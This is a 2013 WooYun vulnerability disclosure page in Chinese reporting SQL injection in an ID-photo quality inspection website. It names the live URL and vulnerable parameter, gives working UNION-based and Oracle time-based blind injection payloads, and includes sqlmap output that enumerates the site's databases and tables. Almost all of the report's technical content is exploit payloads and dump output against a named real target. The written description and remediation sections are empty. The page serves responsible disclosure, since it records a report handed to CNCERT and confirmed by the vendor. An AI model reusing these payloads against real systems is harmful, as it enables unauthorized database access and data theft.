当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034798

漏洞标题:证件照片质量检测中心SQL注入漏洞

相关厂商:太极计算机

漏洞作者: lucky

提交时间:2013-08-20 14:57

修复时间:2013-10-04 14:58

公开时间:2013-10-04 14:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-20: 细节已通知厂商并且等待厂商处理中
2013-08-24: 厂商已经确认,细节仅向厂商公开
2013-09-03: 细节向核心白帽子及相关领域专家公开
2013-09-13: 细节向普通白帽子公开
2013-09-23: 细节向实习白帽子公开
2013-10-04: 细节向公众公开

简要描述:

详细说明:

http://jxcrj.com/text/webtext.aspx?type=-1


---
Place: GET
Parameter: type
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: type=-1' UNION ALL SELECT CHR(58)||CHR(116)||CHR(122)||CHR(109)||CHR(58)||CHR(74)||CHR(100)||CHR(119)||CHR(102)||CHR(74)||CHR(113)||CHR(81)||CHR(67)||CHR(69)||CHR(98)||CHR(58)||CHR(104)||CHR(119)||CHR(119)||CHR(58), NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: type=-1' AND 4189=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(105)||CHR(85)||CHR(105),5) AND 'wHOL'='wHOL
---
[00:31:49] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [28]:
[*] CTXSYS
[*] HR
[*] KTHCRJ
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TJZPJC_OLD
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZPJC
[*] ZPJC_TEMP
Database: CTXSYS
[36 tables]
+-------------------------+
| DR$CLASS |
| DR$DELETE |
| DR$INDEX |
| DR$INDEX_ERROR |
| DR$INDEX_OBJECT |
| DR$INDEX_PARTITION |
| DR$INDEX_SET |
| DR$INDEX_SET_INDEX |
| DR$INDEX_VALUE |
| DR$OBJECT |
| DR$OBJECT_ATTRIBUTE |
| DR$OBJECT_ATTRIBUTE_LOV |
| DR$ONLINE_PENDING |
| DR$PARALLEL |
| DR$PARAMETER |
| DR$PART_STATS |
| DR$PENDING |
| DR$POLICY_TAB |
| DR$PREFERENCE |
| DR$PREFERENCE_VALUE |
| DR$SECTION |
| DR$SECTION_GROUP |
| DR$SERVER |
| DR$SQE |
| DR$STATS |
| DR$STOPLIST |
| DR$STOPWORD |
| DR$SUB_LEXER |
| DR$THS |
| DR$THS_BT |
| DR$THS_FPHRASE |
| DR$THS_PHRASE |
| DR$UNINDEXED |
| DR$WAITING |
| SYS_IOT_OVER_26472 |
| SYS_IOT_OVER_26567 |
+-------------------------+
Database: MDSYS
[18 tables]
+--------------------------------+
| CS_SRS |
| MD$RELATE |
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_ANGLE_UNITS |
| SDO_AREA_UNITS |
| SDO_DATUMS |
| SDO_DIST_UNITS |
| SDO_ELLIPSOIDS |
| SDO_GEOM_METADATA_TABLE |
| SDO_INDEX_METADATA_TABLE |
| SDO_LRS_METADATA_TABLE |
| SDO_MAPS_TABLE |
| SDO_PROJECTIONS |
| SDO_STYLES_TABLE |
| SDO_THEMES_TABLE |
| USER_CS_SRS |
| USER_TRANSFORM_MAP |
+--------------------------------+
Database: WKSYS
[38 tables]
+---------------------------+
| SYS_IOT_OVER_27796 |
| SYS_IOT_OVER_27912 |
| WK$CHARSET |
| WK$CRAWLER_CONFIG_DEFAULT |
| WK$INSTANCE |
| WK$INST_ADMIN |
| WK$LANG |
| WK$MIMETYPES |
| WK$SNP_DEP |
| WK$SNP_TAB |
| WK$SUBSCRIBER |
| WK$SYS_CONFIG |
| WK$SYS_PRIV |
| WK$_ATTR_MAPPING |
| WK$_ATTR_USAGE |
| WK$_AUTHBASIC |
| WK$_CRAWLER_CONFIG |
| WK$_CRAWLER_SCHED |
| WK$_CRAWLER_STAT |
| WK$_DATA_SOURCE |
| WK$_DATA_SOURCE_PARAM |
| WK$_DATA_SOURCE_PARAM_VAL |
| WK$_DATA_SOURCE_TYPE |
| WK$_DOC_ATTR |
| WK$_GROUP_DS_MAPPING |
| WK$_JOB_INFO |
| WK$_MAILLIST |
| WK$_PORTAL |
| WK$_PORTAL_DS_MAP |
| WK$_SCHED_MAPPING |
| WK$_SEARCH_ATTR |
| WK$_SEARCH_ATTR_TL |
| WK$_SOURCE_GROUP |
| WK$_SOURCE_GROUP_TL |
| WK$_SYSINFO |
| WK$_SYS_ADMIN |
| WK$_TDS_LOG |
| WK$_TRACE |
+---------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2013-08-24 22:41

厂商回复:

最新状态:

暂无


漏洞评价:

评论